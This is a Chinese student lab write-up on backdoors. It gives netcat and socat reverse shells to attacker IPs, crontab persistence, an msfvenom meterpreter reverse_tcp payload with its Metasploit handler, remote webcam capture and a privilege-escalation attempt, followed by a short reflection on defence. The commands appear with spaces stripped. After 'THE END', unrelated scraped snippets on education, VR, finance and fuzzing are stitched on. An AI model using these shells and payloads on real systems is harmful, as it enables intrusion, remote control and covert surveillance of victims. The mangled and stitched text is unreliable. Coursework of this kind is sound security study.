Exp2后门原理与实践20164309路人龙套

使用ipconfig查看win7虚拟机IP地址为:192.168.236.130

进入文件夹

cdnetcat开始监听

ncat.exe-l-p4309这里的-l是监听模式,-p是选择监听的端口。

nc192.168.236.1304309-e/bin/sh

ncat.exe-ecmd.exe192.168.236.1314309

可以发现,linux端获得了win的shell

ncat.exe-l-p43092.使用crontab指令增加一条定时任务crontab-ecrontab指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab文件中,以供之后读取和执行,"-e"表示编辑

在最后添加一条定时连接win端口的指令

tcp-listen:4309exec:cmd.exe,pty,stderr这个命令可以将cmd.exe绑定到4309端口,并且将cmd.exe的stderr重定向到stdout上

我们可以看到,创建任务成功

使用Windows+l锁定主机后,再解锁,发现程序已经运行

socat-tcp:192.168.236.130:4309这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的4309端口。

在实现的时候我出现了一个问题:在tcp后多打了一个空格,卡了很久,不过好在成功了,大家引以为戒。

修改后发现已经成功获取cmdShell:

在linux端使用msfvenom工具,生成后门:

msfvenom-pwindows/meterpreter/reverse_tcpLHOST=192.168.6.194LPORT=4309-fexe>20164309_backdoor.exe192.168.236.131其中-p使用的payload,为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode.LHOST是反弹回连的IP,即攻击机linux的IP地址,LPORT是回连的端口,-f是生成文件的类型,>输出到哪个文件

由于一开始没有充分理解这里的ip地址的意义,我使用了被攻击win端的地址,导致在之后使用后门的时候屡屡失败。经过理解我发现这里的ip是被攻击主机需要连接的地址,即为攻击机linux端的地址。

需要在win端关闭杀软和防火墙的条件下进行

ncat.exe-lv4309>20164309_backdoor.exe其中-lv表示可以观察到连接状态

nc192.168.236.1304309<20164309_backdoor.exe发送文件在win端命令行显示传输成功

的确传输成功了

输入

msfconsole进入控制台(之后由于实验屡次失败我进入了这个界面不知道多少次。。。幸亏这里有一个小彩蛋,每次进入的界面大都和之前不一样,也算是苦中作乐了吧)

useexploit/multi/handler设置payload

setpayloadwindows/meterpreter/reverse_tcp使用生成后门程序时相同的payload

setLHOST192.168.236.131这里需要与生成后门程序的主机IP相同

setLPORT4309需要使用相同的端口

showoptions显示选项

exploit进行监听

屡次尝试,在纠正了刚刚说的那个错误后在win端运行了正确的后门

还有很多功能可以使用,我们一个一个试试吧

发现无法进行拍照,看看排除一下原因,发现:

貌似虚拟机无法调用内置摄像头

上网查查有什么解决的方法

???现在去买一个外置摄像头也来不及了,忍痛割爱在自己主机上试试吧。。。

按部就班地进行试验:

查得ip地址为:192.168.6.194

传输后门

在linux准备就绪后运行后门

发现可以拍照了,那多拍几张选一张看得出生理特征的(比如眼镜(???)),就决定是你了:hAcbeMwj,jpeg

输入getuid查看权限分组

输入getsystem进行提权

发现在提权时遇到了一些问题,无法提权

再试试win7的管理员账号

意想不到的是竟然成功了,希望大神们能帮忙解释一下原理

记得很久以前的三一五晚会曝光了一些手机APP擅自添加后门,导致巨大的财产损失的案例,那时候智能手机方兴未艾,人们的安全意识也相对薄弱,但是现在这样的事情还真实地发生在我们身边;还有一些钓鱼网站会诱导我们点击下载一些后门程序,一旦程序运行就成了人为刀俎我为鱼肉的情形了。

后门可能会伪装成正常的程序或软件,诱导用户使用,来获取你的权限。

远程拍照功能。在之前bm管理概论的课程中我阅读了《无处可藏》这本书,有一段令我印象深刻的细节是斯诺登笔记本电脑的摄像头用胶带封住了,当时我还认为杞人忧天了,但是没有想到这种技术门槛这么低。

对于我们来说最好的办法就是经常性的杀毒、及时更新系统、病毒库以查找后门。在实验中我还发现在进行远程照相的时候我摄像头旁边的呼吸灯闪了一下,如果现实生活中遇到这种情况务必要注意了

THE END
1.在智能课堂“预见”未来教师据了解,面对人工智能时代对教师提出的新挑战,上海师范大学在师范生培养中也特别增强以“人工智能”为核心的信息素养实践能力培养,构建“高校、中小学、行业企业”多元协同参与的实践培养模式,全面提升未来教师的综合素养。 “知行图谱”预见未来教师 “除了课堂教学的场景模拟,我们还开发了一系列虚拟教学环境应用场景,比如http://www.jyb.cn/rmtzgjyb/202412/t20241214_2111283235.html
2.VR虚拟系统教学:重塑教育体验的未来之路高等教育:在高等教育中,VR虚拟系统可以应用于实验室教学、远程授课等多个方面。通过VR虚拟系统,学生可以在家中进行实验操作、参加远程课堂等任务,从而打破时间和空间的限制。这种教学方式有助于提高学生的自主学习能力和创新能力,促进教育资源的共享和优化配置。 https://www.pbids.com/aboutUs/pbidsNews/1861300121293131776
3.名师工作室创客教育强调学生在团队中分工合作,共同完成项目,培养学生的团队精神和协作能力。第三,培养学生的创新思维。创客教育鼓励学生勇于尝试新想法、新方法,培养学生的创新精神和解决问题的能力。第四,引导学生运用科技解决实际问题。创客教育注重将学科知识与社会实际问题相结合,引导学生运用科技手段解决现实问题,培养学生的应用http://gzs.hsszhjy.cn/studios/other_detail?detail=7013&t=2
4.关于转发《教育部教育技术与资源发展中心(中央电化教育馆)关于(四)中小学人工智能教育教学课例专项组 根据个人自愿参加原则,由参与活动教师本人于2024年4月1日-10月15日期间登陆国家教育资源公共服务平台(www.eduyun.cn)上传活动作品,具体内容及步骤详见附件3。 (五)中小学虚拟实验教学应用课例专项组 根据个人自愿参加原则,由参与活动教师本人于2024年4月1日-10月15日期间登陆https://www.xzeduc.cn/index/news/119
5.关于开展“高等学校虚拟仿真教学创新实验室”项目2024年度案例2024年度项目案例征集主题为:高校虚拟仿真实验教学案例,具体指综合运用虚拟仿真实验教学资源、装备、平台等条件,构建虚拟仿真实验教学环境,着力解决教学中的重点、难点问题,转变学习方式,创新教学模式,取得显著教育改革成效的案例。 二、案例要求 (一)数量要求 http://jwc.hfut.edu.cn/info/1013/3979.htm
6.虚拟商务(精雅篇)面对信息技术的快速发展, 在电子商务领域中, 虚拟现实技术异军突起。该技术可以为消费者建构一个虚拟的购物场景, 消费者置身于这一场景中仿佛进入真实的消费场所, 可以通过该技术与商品进行交互操作, 从而激发消费者购买的欲望, 这样不仅可以降低商家的生产成本, 同时还可以满足消费者对产品全面了解的要求。 https://www.360wenmi.com/f/cnkeyzh2spr9.html
7.卖空交易与股票价格稳定性——来自中国融资融券市场的自然实验2015年第6期No. 6, 2015 (总第420期)4、hUf也General 卖空交易与股票价格稳定性一一来自中国融资融券市场的自然实验李志生杜爽林秉旋(中南财经政法大学金融学院,湖北武汉430073 ;罗德岛大学商学院,Kingston 02881) 摘要:基于2009年4月-2013年12月我国股票市场的数据,本文研究了融资融券标的股票和非标的股票、以及股https://doc.mbalib.com/m/view/e6b27525d850335ea8b4b5af35fda37b.html?_t=t?_t=t
8.有关“新冠疫情”防控期间与公共法律服务有关的法律法规及相关规范性法为认真贯彻落实习近平总书记重要指示精神,按照党中央、国务院关于防控新冠肺炎疫情的决策部署,现就做好中小学延期开学期间“停课不停学”工作通知如下。 一、总体要求 “停课不停学”要坚持把做好疫情防控工作放在首位,维护广大师生健康安全,坚决防止疫情向校园蔓延。要坚持省级统一部署与各地各校因地制宜实施相结合,为https://www.lawyers.org.cn/info/5a07e3fbc4904431a08c71839421284d/
9.学习课题基金项目论文选题热点选题2021最新虚拟现实(VR)沉浸式环境如何实现深度取向的学习投入?——复杂任务情境中的学习效果研究 2021 基于协商的学伴推荐:自适应学习的社会性发展路向 2021 人工智能教育应用的视觉交互“赋能”效应研究 2021 预见人工智能的未来及其教育影响——以社会性科幻为载体的思想实验 2021 当现实逼近想象:人工智能时代预见未来教育研究 https://xuantibao.com/subject/detail?sid=6&wid=5628
10.通过灰盒Fuzzing技术来发现MacOSX安全漏洞在一次典型的执行中,它从fuzzing引擎中接收到测试数据之后,检查数据是否符合分派表中声明目标方法的要求,适当的调整以符合最后在kext中执行目标方法的IoConncetCallMethod()函数. 如果测试数据没有导致崩溃,kext发出一个回应,由monitor来接收。monitor根据接收到的放回数据和当前的fuzzing引擎来决定是否继续使用当前的引擎https://blog.csdn.net/weixin_34293911/article/details/87981075
11.气体动力学直接模拟MonteCarlo.PDF文档全文预览32 2 计 算 物 理 Vol. 32 ,No. 2 第 卷第 期 20 15 3 CHINESE JOURNAL OF COMPUTATIONAL PHYSICS Mar. ,20 15 年月 文章编号:1001-246X (2015)02-0169-08 气体动力学直接模拟Monte Carlo 的 高效GPU 并行计算 * , , 贺永翔 刘昕 赵海波 ( , 430074 ) 华中科技大学煤燃烧国家重点实验室 武汉 https://max.book118.com/html/2019/1215/7122131110002110.shtm